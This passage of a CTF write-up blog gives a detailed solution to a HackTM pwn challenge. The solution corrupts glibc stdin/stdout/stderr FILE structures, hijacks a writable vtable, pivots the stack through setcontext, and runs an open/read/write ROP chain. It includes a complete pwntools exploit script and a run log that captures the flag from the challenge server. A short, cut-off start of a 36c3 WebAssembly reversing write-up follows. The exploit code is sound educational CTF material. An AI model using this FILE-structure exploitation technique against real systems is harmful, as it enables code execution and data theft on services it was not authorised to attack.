sym.imp.seccomp_rule_add(iVar2, 0x7fff0000, 0x3c, 0); # sys_exit
sym.imp.seccomp_rule_add(iVar2, 0x7fff0000, 0xe7, 0); # sys_exit_group

So we don’t have execve syscall so we can’t get a proper shell, but we still have sys_write,sys_read,sys_write which can be used to read the flag file from a path location.

nohack function

int nohack()
{
  if ( ((_WORD)stdout + 2208) & 0xFFF )
  {
    puts("mprotect error");
    exit(1);
  }
  return mprotect(&stdout[10]._IO_write_end, 0x700uLL, 1);
}

In libc-2.29 the permissions to write in vtables are enabled so the author decided to make them read only but he did a mistake in setting the ranges, he missed a couple of tables:

Blocked vtables from the author:

_IO_wfile_jumps_mmap
_IO_wfile_jumps
_IO_wmem_jumps
_IO_mem_jumps
_IO_strn_jumps
_IO_obstack_jumps
_IO_file_jumps_maybe_mmap
_IO_file_jumps_mmap
_IO_file_jumps
_IO_str_jumps

Unblocked vtables:

_IO_helper_jumps
_IO_cookie_jumps
_IO_proc_jumps
_IO_str_chk_jumps
_IO_wstrn_jumps
_IO_wfile_jumps_maybe_mmap

Because of this the only thing we need to do is to change the vtable pointer into one of the writeable vtables to get control of rip.

Get arbitrary write with “unlimited” input

First thing we notice is that we have two very limited arbitrary writes with a max size of long long and we can only change two locations in memory.

This is the uninitialised _IO_2_1_stdin_:

What happens next depends on setvbuf option:

int main_init()
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  return setvbuf(stderr, 0LL, 2, 0LL);
}

From here we know the option used is _IONBF which means “No buffering” the buffer is not used. Each I/O operation is written as soon as possible. This a usual thing in ctfs to disable buffering of stdout, stdin and stderr and this time is very handy for us because instead of allocating a new buffer on the heap, the limits of _IO_buf_base and _IO_buf_end will be defined with pointers within stdin where _IO_buf_end-_IO_buf_base = 1 saving only 1 character which will be the end line character (‘\n’ or ‘’ depends on the input).

Here is the stdin after being initialized by setvbuf:

If we use the first scanf to increase the value of stdio->_IO_buf_end, instead of only controlling the _shortbuf field we will be able to control the contents of what comes next:

Also the libc source code can be found at:

if (fp->_IO_buf_base
          && want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base)) // sub must be positive
        {
          if (__underflow (fp) == EOF)
        break;

          continue;
        }

      /* These must be set before the sysread as we might longjmp out
         waiting for input. */
      _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
      _IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);

      /* Try to maintain alignment: read a whole number of blocks.  */
      count = want;
      if (fp->_IO_buf_base)
        {
          size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;
          if (block_size >= 128)
        count -= want % block_size; // writing in blocks 
        }

      count = _IO_SYSREAD (fp, s, count); // we want to reach here in order to complete the read

Much better images explaining the code above can be found in Angelboy slides.

Python code:

1	r.sendlineafter('1 : ', "%x %x" %(_IO_2_1_STDIN_+_IO_BUF_END,_IO_2_1_STDIN_+0x2000))

Filling the memory

From the initial plan we know we must change values on _IO_2_1_STDOUT->file->vtable, and values on the _IO_helper_jumps vtable but there will be a lot of values in the middle because we are overflowing everything from the very beginning, in this case from the stdin we can’t just fill everything with nulls and expect everything to run smoothly , obviously the program will break if we do that we need to keep an eye on the fields that contain mappable addresses.

 _lock(1st) and _wide_data(2nd) and vtable(last) fields must have 
 a valid mappable address preferable to the original ones(_lock).
                                                            ^
0x7fb4561efa80 <_IO_2_1_stdin_+128>:    0x000000000a000000  |__ 0x00007fb4561f2590
0x7fb4561efa90 <_IO_2_1_stdin_+144>:    0xffffffffffffffff  |   0x0000000000000000
0x7fb4561efaa0 <_IO_2_1_stdin_+160>:    0x00007fb4561efae0 _|   0x0000000000000000 
0x7fb4561efab0 <_IO_2_1_stdin_+176>:    0x0000000000000000  |   0x0000000000000000
0x7fb4561efac0 <_IO_2_1_stdin_+192>:    0x00000000ffffffff  |   0x0000000000000000
0x7fb4561efad0 <_IO_2_1_stdin_+208>:    0x0000000000000000  |__ 0x00007fb4561f1560
0x7fb4561efae0 <_IO_wide_data_0>:       0x0000000000000000      0x0000000000000000
........
0x7fb4561efc10 <_IO_wide_data_0+304>:   0x00007fb4561f1020      0x0000000000000000
0x7fb4561efc20 <__memalign_hook>:       0x00007fb4560a4190      0x0000000000000000 -> Can be filled with 0s
0x7fb4561efc30 <__malloc_hook>: 0x0000000000000000      0x0000000000000000
0x7fb4561efc40 :    0x0000000000000000      0x0000000000000001-----------|
......                                                                               |-> Can be filled with 0s
0x7fb4561f04d0 :       0x0000000000021000      0x00007fb4560a5a90---|
0x7fb4561f0520 :       0x0000000000000000      0x0000000000000001 --|                                                                
0x7fb4561f0530 :    0x0000000000000002      0x00007fb4561f32d8   |                                                            
0x7fb4561f0540 :    0x0000000000000000      0xffffffffffffffff   |                                                             
0x7fb4561f0550 <__libc_utmp_jump_table>:        0x00007fb4561ee6e0      0x00007fb4561c1e48   |-> must be filled                                                            
0x7fb4561f0560 <_nl_global_locale>:     0x00007fb4561ec580      0x00007fb4561ecac0           |with the correct                                                              
...............                                                                              |values otherwise 
0x7fb4561f0640 <_nl_global_locale+224>: 0x00007fb4561bc678      0x0000000000000000 ----------|page fault.                                                             
0x7fb4561f0650: 0x0000000000000000      0x0000000000000000
0x7fb4561f0660 <_IO_list_all>:  0x00007fb4561f0680      0x0000000000000000 --> Keep this too
0x7fb4561f0670: 0x0000000000000000      0x0000000000000000
0x7fb4561f0680 <_IO_2_1_stderr_>:       0x00000000fbad2087      0x00007fb4561f0703 --|->calculate the offsets                                                                        
.....                                                                                |from the libc_base to
0x7fb4561f0750 <_IO_2_1_stderr_+208>:   0x0000000000000000      0x00007fb4561f1560 --|read original values                                                                        
0x7fb4561f0760 <_IO_2_1_stdout_>:       0x00000000fbad2887      0x00007fb4561f07e3 --|-> Everything remains the                                                                       
....                                                                               --|same
0x7fb4561f0830 <_IO_2_1_stdout_+208>:   0x0000000000000000      0x00007fb4561f1560 -> Change to _IO_helper_jumps                                                                         
0x7fb4561f0840 :        0x00007fb4561f0680      0x00007fb4561f0760--|-> Stays the same
0x7fb4561f0850 : 0x00007fb4561efa00      0x00007fb456031e90----------|
0x7fb4561f0860 <__elf_set___libc_subfreeres_element_free_mem__>:        0x00007fb45619fdd0--|-> can be filled
...                                                                                         |with 0s. 
0x7fb4561f0940 <__elf_set___libc_subfreeres_element_pw_map_free__>:     0x00007fb4561a1d10--|      
0x7fb4561f0950: 0x0000000000000000      0x0000000000000000
                                                           |-> the address that will control RIP
0x7fb4561f0960 <_IO_helper_jumps>:      0x0000000000000000 |    0x0000000000000000
0x7fb4561f0970 <_IO_helper_jumps+16>:   0x00007fb45609ca70_|    0x00007fb45607f530
0x7fb4561f0980 <_IO_helper_jumps+32>:   0x00007fb45609c140      0x00007fb45609c150
0x7fb4561f0990 <_IO_helper_jumps+48>:   0x00007fb45609d7b0      0x00007fb45609c1b0
0x7fb4561f09a0 <_IO_helper_jumps+64>:   0x00007fb45609c3b0      0x00007fb45609cae0
0x7fb4561f09b0 <_IO_helper_jumps+80>:   0x00007fb45609c800      0x00007fb45609c6d0
0x7fb4561f09c0 <_IO_helper_jumps+96>:   0x00007fb45609ca60      0x00007fb45609c870
0x7fb4561f09d0 <_IO_helper_jumps+112>:  0x00007fb45609d910      0x00007fb45609d920
0x7fb4561f09e0 <_IO_helper_jumps+128>:  0x00007fb45609d8f0      0x00007fb45609ca60
0x7fb4561f09f0 <_IO_helper_jumps+144>:  0x00007fb45609d900      0x0000000000000000
0x7fb4561f0a00 <_IO_helper_jumps+160>:  0x0000000000000000      0x0000000000000000
...

Now in python, filling stdin:

# STDIN+131
INPUT2 ='\x0a'+'\x00'*4# p64(_IO_STDFILE_0_LOCK)
INPUT2 += p64(_IO_STDFILE_0_LOCK)
INPUT2 += p64(-0x1, signed=True) # _offset
INPUT2 += p64(0x0) # _codecvt
INPUT2 += p64(_IO_WIDE_DATA_0) # _wide_data
INPUT2 += p64(0x0) # _freeres_list
INPUT2 += p64(0x0) # _freeres_buf
INPUT2 += p64(0x0) # __pad5
INPUT2 += p32(-0x1, signed=True) # _mode
INPUT2 += p32(0x0) # _unused2
INPUT2 += p64(0x0) # _unused2
INPUT2 += p64(0x0) # _unused2
INPUT2 += p64(_IO_FILE_JUMPS) # vtable"""
INPUT2 += p64(0x0)*19*2 + p64(LIBC+0x1bb020)+p64(0x0)
INPUT2 += p64(LIBC+libc.symbols['__memalign_hook']) # __memalign_hook
INPUT2 += p64(0x0)
INPUT2 += p64(0x0)+p64(0x0)

Filling from main_arena until the end of _nl_global_locale:

INPUT2 += '\x00'*2208 # MAIN_ARENA
INPUT2 += p64(LIBC+0x896b0) + p64(0x0) # obstack_alloc_failed_handler
INPUT2 += p64(LIBC+0x185072)*2 # tzname
INPUT2 += p64(0)*4 # program_invocation_short_name
INPUT2 += p64(0)+p64(1)+p64(2)+p64(LIBC+0x1bd2d8)+p64(0)+p64(-0x1,signed=True) # default_overflow_region
INPUT2 += p64(LIBC)+p64(LIBC) # __libc_utmp_jump_table
    
# _nl_global_locale
OFFSETLIST = [1971584, 1972928, 1973056, 1975232, 1972480, 1972352, 0, 1974400, 1974496, 1974624, 1974816, 1974944, 1975040, 1680352, 1676512, 1678048, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 0]
for offset in OFFSETLIST:
    if offset == 0:
        INPUT2 += p64(0)
    else:    
        INPUT2 += p64(LIBC+offset)
INPUT2 += p64(0)*2
INPUT2 += p64(_IO_LIST_ALL+0x20)+p64(0)*3 # IO_LIST_ALL

Filling stderr:

# STDERR
INPUT2 += p64(0xfbad2887) # _flags
INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_read_ptr
INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_read_end
INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_read_base
INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_write_base
INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_write_ptr
INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_write_end
INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_buf_base
INPUT2 += p64(_IO_2_1_STDERR_+132) # _IO_buf_end
INPUT2 += p64(0x0) # _IO_save_base
INPUT2 += p64(0x0) # _IO_backup_base
INPUT2 += p64(0x0) # _IO_save_end
INPUT2 += p64(0x0) # _markers
INPUT2 += p64(_IO_2_1_STDOUT_) # _chain
INPUT2 += p32(0x0) # _fileno
INPUT2 += p32(0x0) # _flags2
INPUT2 += p64(-0x1, signed=True) # _old_offset
INPUT2 += p16(0x0) # _cur_column
INPUT2 += p8(0x0) # _vtable_offset
INPUT2 += p8(0x0) # _shortbuf
INPUT2 += p32(0x0) # _shortbuf
INPUT2 += p64(_IO_STDFILE_2_LOCK) # _lock
INPUT2 += p64(-0x1, signed=True) # _offset
INPUT2 += p64(0x0) # _codecvt
INPUT2 += p64(_IO_WIDE_DATA_2) # _wide_data
INPUT2 += p64(0x0) # _freeres_list
INPUT2 += p64(0x0) # _freeres_buf
INPUT2 += p64(0x0) # __pad5
INPUT2 += p32(-0x1, signed=True) # _mode
INPUT2 += p32(0x0) # _unused2
INPUT2 += p64(0x0) # _unused2
INPUT2 += p64(0x0) # _unused2
INPUT2 += p64(_IO_FILE_JUMPS) # vtable

Changing stdout vtable from _IO_file_jumps to _IO_helper_jumps to bypass the mprotect call:

# STDOUT
INPUT2 += p64(0x0) # _flags
INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_read_ptr
INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_read_end
INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_read_base
INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_write_base
INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_write_ptr
INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_write_end
INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_buf_base
INPUT2 += p64(_IO_2_1_STDOUT_+132) # _IO_buf_end
INPUT2 += p64(0x0) # _IO_save_base
INPUT2 += p64(0x0) # _IO_backup_base
INPUT2 += p64(0x0) # _IO_save_end
INPUT2 += p64(0x0) # _markers
INPUT2 += p64(_IO_2_1_STDIN_) # _chain
INPUT2 += p32(0x0) # _fileno
INPUT2 += p32(0x0) # _flags2
INPUT2 += p64(-0x1, signed=True) # _old_offset
INPUT2 += p16(0x0) # _cur_column
INPUT2 += p8(0x0) # _vtable_offset
INPUT2 += p8(0x0) # _shortbuf
INPUT2 += p32(0x0) # _shortbuf
INPUT2 += p64(_IO_STDFILE_1_LOCK) # _lock
INPUT2 += p64(-0x1, signed=True) # _offset
INPUT2 += p64(0x0) # _codecvt
INPUT2 += p64(_IO_WIDE_DATA_1) # _wide_data
INPUT2 += p64(0x0) # _freeres_list
INPUT2 += p64(0x0) # _freeres_buf
INPUT2 += p64(0x0) # __pad5
INPUT2 += p32(-0x1, signed=True) # _mode
INPUT2 += p32(0x0) # _unused2
INPUT2 += p64(0x0) # _unused2
INPUT2 += p64(0x0) # _unused2
INPUT2 += p64(_IO_HELPER_JUMPS) # vtable changed to _IO_HELPER_JUMPS

Filling the rest:

INPUT2 += p64(_IO_2_1_STDERR_) # stderr
INPUT2 += p64(_IO_2_1_STDOUT_) # stdout
INPUT2 += p64(_IO_2_1_STDIN_) # stdin
INPUT2 += p64(0)

#print(len(ROP_CHAIN))
INPUT2 += '\x00'*(0x1f*8) # __elf_set___libc_subfreeres
INPUT2 += p64(0)

Control Rip and stackpivot

We can control RIP by changing _finish from _IO_helper_jumps vtable:

And why? because fclose(stdout) will be executed in the main_function, and it uses pointers from the vtable.

Fclose closes a file stream, and releases the file pointer and related buffer, it will first call _IO_unlink_it to delink the specified FILE from the _chain list:

1 2	if (fp->_IO_file_flags & _IO_IS_FILEBUF) _IO_un_link ((struct _IO_FILE_plus *) fp);

After that will call the system interface to close it:

1 2	if (fp->_IO_file_flags & _IO_IS_FILEBUF) status = _IO_file_close_it (fp);

Finally, the _IO_FINISH in the vtable is called, which corresponds to the _IO_file_finish function:

1	_IO_FINISH (fp);

Now that we control the rip we need a way to stack pivot, so lets first see the value of the registers when we jump to _IO_FINISH pointer by changing it into 0xdeadbeef:

# vtable IO_HELPER_JUMPS
INPUT2 += p64(0) _DUMMY1
INPUT2 += p64(0) _DUMMY2
INPUT2 += p64(0xdeadbeef) # _FINISH

GDB image on pagefault:

So what is exactly stack pivoting? Stacking pivoting is basically changing the stack pointer to point somewhere else, we want this because this time our ropchain won’t be located in the stack but in libc, if we don’t pivot when executing ret instructions we will just jump into values in the stack which is not what we want, there is a need to change the stack pointer to point into ropchain location.

We can control the contents of RDX, to use it we need to find something like mov rsp, qword ptr [rdx]; ret, a gadget like this can be found at setcontext+0x35:

So rdx is right at _IO_helper_jumps so we need to put the rop_chain at _IO_helper_jumps + 0xa0 because of the instruction mov rsp, qword ptr [rdx+0xa0];, by changing the stack pointer into the right libc address we can easily do the jumps:

INPUT2 += p64(0)+p64(0)+p64(SETCONTEXT_SPITVOT) # _IO_helper_jumps STACKPIVOT SETCONTEXT
POPRAX = LIBC + 0x0000000000047cf8 # pop rax ; ret
POPRDI = LIBC + 0x0000000000026542 # pop rdi ; ret
POPRDX = LIBC + 0x000000000012bda6 # pop rdx ; ret
POPRSI = LIBC + 0x0000000000026f9e # pop rsi ; ret
SYSCALL = LIBC + 0x00000000000cf6c5 # syscall ; ret
    
FLAG_PATH = _IO_HELPER_JUMPS+0x178#LIBC+0x1baad8#+16*8
ROP_ADDR = _IO_HELPER_JUMPS+0xa8#LIBC+0x1baa08

ROP_CHAIN = p64(POPRAX)*2#p64(OPEN)
ROP_CHAIN += p64(2) + p64(POPRDI) + p64(FLAG_PATH) + p64(POPRSI) + p64(0) + p64(SYSCALL) # OPEN(file=flag_path) syscall == 2
ROP_CHAIN += p64(POPRAX) + p64(0) + p64(POPRDI) + p64(3) + p64(POPRSI) + p64(FLAG_PATH) + p64(POPRDX) + p64(0x49) +p64(SYSCALL) # READ(fd=3,buf=flag_path,nbytes=0x49) syscall == 0
ROP_CHAIN += p64(POPRAX) + p64(1) + p64(POPRDI) + p64(1) + p64(POPRSI) + p64(FLAG_PATH) + p64(POPRDX) + p64(0x49) +p64(SYSCALL) # WRITE(fd=1,buf=flag_path,nbyes=0x49) syscall == 1
ROP_CHAIN += "flag\x00"

INPUT2 += '\x00'*0x88+p64(ROP_ADDR)+ ROP_CHAIN #+ '\x00'*(190+7+3) + ROP_CHAIN#+ '\x00'*(0x90-0x88+0x8)+ p64(LIBC)

Again we can’t use execve but we can use open, read and write which is enought to solve the challenge. In the end we will be executing this:

1
2
3

fd= open('flag\x00', 'r') # fd will be equal to 3
read(fd, flag_path, 0x49)
write(1, flag_path, 0x49)

The reason why fd will be equal to 3 is because _IO_LIST_ALL contains a linked list of the filestreams, by default stdin,stdout and stderr are already loaded so the next is 3:

1	0(stdin)->1(stdout)->2(stderr)->3(newfd)

Full python code:

from pwn import *
host, port = "138.68.67.161", "20006"
filename = "./trip_to_trick"
elf = ELF(filename)
context.arch = 'amd64'

if not args.REMOTE:
    libc = elf.libc
else:
    libc = ELF('./libc.so.6')

def getConn():
    return process(filename) if not args.REMOTE else remote(host, port)

def get_PIE(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"rb").readlines()
    return int(memory_map[0].split("-")[0],16)

def debug(bp):
    script = ""
    PIE = get_PIE(r)
    PAPA = PIE
    for x in bp:
        script += "b *0x%x\n"%(PIE+x)
    gdb.attach(r,gdbscript=script)
context.terminal = ['tmux', 'new-window']
def exploit():
    global r
    r = getConn()
    if not args.REMOTE and args.GDB:
        debug([0x000014e2,0x000013ce])
    r.recvuntil('gift : ')
    SYSTEM = int(r.recvline().rstrip(),16)
    LIBC = SYSTEM-libc.symbols['system']

    _IO_BUF_BASE = 0x38
    _IO_BUF_END = 0x40
    
    _IO_2_1_STDIN_ = LIBC+libc.symbols['_IO_2_1_stdin_']
    _IO_2_1_STDERR_ = LIBC+libc.symbols['_IO_2_1_stderr_']
    _IO_2_1_STDOUT_ = LIBC+libc.symbols['_IO_2_1_stdout_']
    
    _IO_FILE_JUMPS = LIBC+libc.symbols['_IO_file_jumps']
    _IO_HELPER_JUMPS = _IO_2_1_STDIN_+0xf60
    
    _IO_STDFILE_0_LOCK = _IO_2_1_STDIN_+0x2b90
    _IO_WIDE_DATA_0 = _IO_2_1_STDIN_+0xe0

    _IO_STDFILE_1_LOCK = _IO_2_1_STDOUT_+0x1e20
    _IO_WIDE_DATA_1 = _IO_2_1_STDOUT_-0xea0

    _IO_STDFILE_2_LOCK = _IO_2_1_STDERR_+0x1ef0
    _IO_WIDE_DATA_2 = _IO_2_1_STDERR_-0xf00

    _IO_LIST_ALL = LIBC+libc.symbols['_IO_list_all']
    SETCONTEXT_SPITVOT = LIBC+libc.symbols['setcontext']+0x35

    log.info("SYSTEM 0x%x" % SYSTEM)
    log.info("LIBC 0x%x" % LIBC)

    # STDIN+131
    INPUT2 ='\x0a'+'\x00'*4# p64(_IO_STDFILE_0_LOCK)
    INPUT2 += p64(_IO_STDFILE_0_LOCK)
    INPUT2 += p64(-0x1, signed=True) # _offset
    INPUT2 += p64(0x0) # _codecvt
    INPUT2 += p64(_IO_WIDE_DATA_0) # _wide_data
    INPUT2 += p64(0x0) # _freeres_list
    INPUT2 += p64(0x0) # _freeres_buf
    INPUT2 += p64(0x0) # __pad5
    INPUT2 += p32(-0x1, signed=True) # _mode
    INPUT2 += p32(0x0) # _unused2
    INPUT2 += p64(0x0) # _unused2
    INPUT2 += p64(0x0) # _unused2
    INPUT2 += p64(_IO_FILE_JUMPS) # vtable"""
    INPUT2 += p64(0x0)*19*2 + p64(LIBC+0x1bb020)+p64(0x0)
    INPUT2 += p64(LIBC+libc.symbols['__memalign_hook']) # __memalign_hook
    INPUT2 += p64(0x0)
    INPUT2 += p64(0x0)+p64(0x0)

    INPUT2 += '\x00'*2208 # MAIN_ARENA
    INPUT2 += p64(LIBC+0x896b0) + p64(0x0) # obstack_alloc_failed_handler
    INPUT2 += p64(LIBC+0x185072)*2 # tzname
    INPUT2 += p64(0)*4 # program_invocation_short_name
    INPUT2 += p64(0)+p64(1)+p64(2)+p64(LIBC+0x1bd2d8)+p64(0)+p64(-0x1,signed=True) # default_overflow_region
    INPUT2 += p64(LIBC)+p64(LIBC) # __libc_utmp_jump_table
    
    # _nl_global_locale
    OFFSETLIST = [1971584, 1972928, 1973056, 1975232, 1972480, 1972352, 0, 1974400, 1974496, 1974624, 1974816, 1974944, 1975040, 1680352, 1676512, 1678048, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 1775224, 0]
    for offset in OFFSETLIST:
        if offset == 0:
            INPUT2 += p64(0)
        else:    
            INPUT2 += p64(LIBC+offset)
    INPUT2 += p64(0)*2
    INPUT2 += p64(_IO_LIST_ALL+0x20)+p64(0)*3 # IO_LIST_ALL

    # STDERR
    INPUT2 += p64(0xfbad2887) # _flags
    INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_read_ptr
    INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_read_end
    INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_read_base
    INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_write_base
    INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_write_ptr
    INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_write_end
    INPUT2 += p64(_IO_2_1_STDERR_+131) # _IO_buf_base
    INPUT2 += p64(_IO_2_1_STDERR_+132) # _IO_buf_end
    INPUT2 += p64(0x0) # _IO_save_base
    INPUT2 += p64(0x0) # _IO_backup_base
    INPUT2 += p64(0x0) # _IO_save_end
    INPUT2 += p64(0x0) # _markers
    INPUT2 += p64(_IO_2_1_STDOUT_) # _chain
    INPUT2 += p32(0x0) # _fileno
    INPUT2 += p32(0x0) # _flags2
    INPUT2 += p64(-0x1, signed=True) # _old_offset
    INPUT2 += p16(0x0) # _cur_column
    INPUT2 += p8(0x0) # _vtable_offset
    INPUT2 += p8(0x0) # _shortbuf
    INPUT2 += p32(0x0) # _shortbuf
    INPUT2 += p64(_IO_STDFILE_2_LOCK) # _lock
    INPUT2 += p64(-0x1, signed=True) # _offset
    INPUT2 += p64(0x0) # _codecvt
    INPUT2 += p64(_IO_WIDE_DATA_2) # _wide_data
    INPUT2 += p64(0x0) # _freeres_list
    INPUT2 += p64(0x0) # _freeres_buf
    INPUT2 += p64(0x0) # __pad5
    INPUT2 += p32(-0x1, signed=True) # _mode
    INPUT2 += p32(0x0) # _unused2
    INPUT2 += p64(0x0) # _unused2
    INPUT2 += p64(0x0) # _unused2
    INPUT2 += p64(_IO_FILE_JUMPS) # vtable
    
    # STDOUT
    INPUT2 += p64(0x0) # _flags
    INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_read_ptr
    INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_read_end
    INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_read_base
    INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_write_base
    INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_write_ptr
    INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_write_end
    INPUT2 += p64(_IO_2_1_STDOUT_+131) # _IO_buf_base
    INPUT2 += p64(_IO_2_1_STDOUT_+132) # _IO_buf_end
    INPUT2 += p64(0x0) # _IO_save_base
    INPUT2 += p64(0x0) # _IO_backup_base
    INPUT2 += p64(0x0) # _IO_save_end
    INPUT2 += p64(0x0) # _markers
    INPUT2 += p64(_IO_2_1_STDIN_) # _chain
    INPUT2 += p32(0x0) # _fileno
    INPUT2 += p32(0x0) # _flags2
    INPUT2 += p64(-0x1, signed=True) # _old_offset
    INPUT2 += p16(0x0) # _cur_column
    INPUT2 += p8(0x0) # _vtable_offset
    INPUT2 += p8(0x0) # _shortbuf
    INPUT2 += p32(0x0) # _shortbuf
    INPUT2 += p64(_IO_STDFILE_1_LOCK) # _lock
    INPUT2 += p64(-0x1, signed=True) # _offset
    INPUT2 += p64(0x0) # _codecvt
    INPUT2 += p64(_IO_WIDE_DATA_1) # _wide_data
    INPUT2 += p64(0x0) # _freeres_list
    INPUT2 += p64(0x0) # _freeres_buf
    INPUT2 += p64(0x0) # __pad5
    INPUT2 += p32(-0x1, signed=True) # _mode
    INPUT2 += p32(0x0) # _unused2
    INPUT2 += p64(0x0) # _unused2
    INPUT2 += p64(0x0) # _unused2
    INPUT2 += p64(_IO_HELPER_JUMPS) # vtable

    INPUT2 += p64(_IO_2_1_STDERR_) # stderr
    INPUT2 += p64(_IO_2_1_STDOUT_) # stdout
    INPUT2 += p64(_IO_2_1_STDIN_) # stdin
    INPUT2 += p64(0)

    #print(len(ROP_CHAIN))
    INPUT2 += '\x00'*(0x1f*8) # __elf_set___libc_subfreeres
    INPUT2 += p64(0)

    # vtable IO_HELPER_JUMPS
    INPUT2 += p64(0)+p64(0)+p64(SETCONTEXT_SPITVOT) # _IO_helper_jumps STACKPIVOT SETCONTEXT
    """
    setcontext+0x35
    mov     rsp, [rdx+0A0h]
    mov     rbx, [rdx+80h]
    mov     rbp, [rdx+78h]
    mov     r12, [rdx+48h]
    mov     r13, [rdx+50h]
    mov     r14, [rdx+58h]
    mov     r15, [rdx+60h]
    mov     rcx, [rdx+0A8h]
    push    rcx
    mov     rsi, [rdx+70h]
    mov     rdi, [rdx+68h]
    mov     rcx, [rdx+98h]
    mov     r8, [rdx+28h]
    mov     r9, [rdx+30h]
    mov     rdx, [rdx+88h]
    xor     eax, eax
    retn
    """

    POPRAX = LIBC + 0x0000000000047cf8 # pop rax ; ret
    POPRDI = LIBC + 0x0000000000026542 # pop rdi ; ret
    POPRDX = LIBC + 0x000000000012bda6 # pop rdx ; ret
    POPRSI = LIBC + 0x0000000000026f9e # pop rsi ; ret
    SYSCALL = LIBC + 0x00000000000cf6c5 # syscall ; ret
    
    FLAG_PATH = _IO_HELPER_JUMPS+0x178#LIBC+0x1baad8#+16*8
    ROP_ADDR = _IO_HELPER_JUMPS+0xa8#LIBC+0x1baa08
    ROP_CHAIN = p64(POPRAX)*2#p64(OPEN)
    ROP_CHAIN += p64(2) + p64(POPRDI) + p64(FLAG_PATH) + p64(POPRSI) + p64(0) + p64(SYSCALL) # OPEN(file=flag_path) syscall == 2
    ROP_CHAIN += p64(POPRAX) + p64(0) + p64(POPRDI) + p64(3) + p64(POPRSI) + p64(FLAG_PATH) + p64(POPRDX) + p64(0x49) +p64(SYSCALL) # READ(fd=3,buf=flag_path,nbytes=0x49) syscall == 0
    ROP_CHAIN += p64(POPRAX) + p64(1) + p64(POPRDI) + p64(1) + p64(POPRSI) + p64(FLAG_PATH) + p64(POPRDX) + p64(0x49) +p64(SYSCALL) # WRITE(fd=1,buf=flag_path,nbyes=0x49) syscall == 1
    ROP_CHAIN += "flag\x00"
    #ROP_CHAIN = ''
    INPUT2 += '\x00'*0x88+p64(ROP_ADDR)+ ROP_CHAIN #+ '\x00'*(190+7+3) + ROP_CHAIN#+ '\x00'*(0x90-0x88+0x8)+ p64(LIBC)

    #INPUT2 += p64(0)*16*2 # _nl_global_locale
    r.sendlineafter('1 : ', "%x %x" %(_IO_2_1_STDIN_+_IO_BUF_END,_IO_2_1_STDIN_+0x2000))
    r.sendafter('2 : ', INPUT2)
    #r.interactive()
    flag = r.recvall(timeout=2)
    r.close()
    if 'HackTM' in flag:
        print(flag)
        return True
    else:
        return False
    
while not exploit():
    pass

Running it:

$ python trip_to_trick.py REMOTE
[*] '/ctf/work/pwn/TripToTrick/trip_to_trick'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/ctf/work/pwn/TripToTrick/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 138.68.67.161 on port 20006: Done
[*] SYSTEM 0x7f1c8b934fd0
[*] LIBC 0x7f1c8b8e2000
[+] Receiving all data: Done (73B)
[*] Closed connection to 138.68.67.161 port 20006
HackTM{d747aab3b6d6a95300eede7e3337397ace5131240e0fa9b849058f27f635e182}

References

[Reverse] 36c3 - xmas_future

2019-12-30T03:02:38.000Z

xmas_future
Points
96
Solves
95
Category
Reverse
Description:
Most people just give you a present for christmas, hxp gives you a glorious future.
If you’re confused, simply extract the flag from this 山葵 and you shall understand. :)
xmas_future-265eb0be46555aad.tar.xz (15.5 KiB)
by benediktwerner

So we are given a bunch of html/wasm file, after running the php web server with the run.sh file we are presented with a page:

The system will say the flag was correct if we insert the right flag, so let’s inspect the source:

Next step is to check hxp2019.js:

Check function is located at the WebAssembly file and its parameters are, the pointer offset to the string and the length of the string.

Instead of debugging the file through OP_CODES in the browser I found a tool that can decompile it and also convert it to a c file.

After cloning the repo I followed the instructions on readme to build and compile the project:

After building everything new executables are added to the bin/ folder:

1
2
3

$ ls bin/
spectest-interp*  wasm2wat*        wasm-interp*   wasm-opcodecnt*  wasm-validate*  wat2wasm*
wasm2c*           wasm-decompile*  wasm-objdump*  wasm-strip*      wast2json*      wat-desugar*

First I decompiled the file using wasm-decompile:

1 2	$ mkdir ../../challenge $ ./wasm-decompile ../../hxp2019_bg.wasm -o ../../challenge/dec.js

And now lets convert also to c:

1	$ ./wasm2c ../../hxp2019_bg.wasm -o ../../challenge/hxp2019_bg.c

Lets see the new files created:

1
2
3

$ cd ../../challenge
$ ls
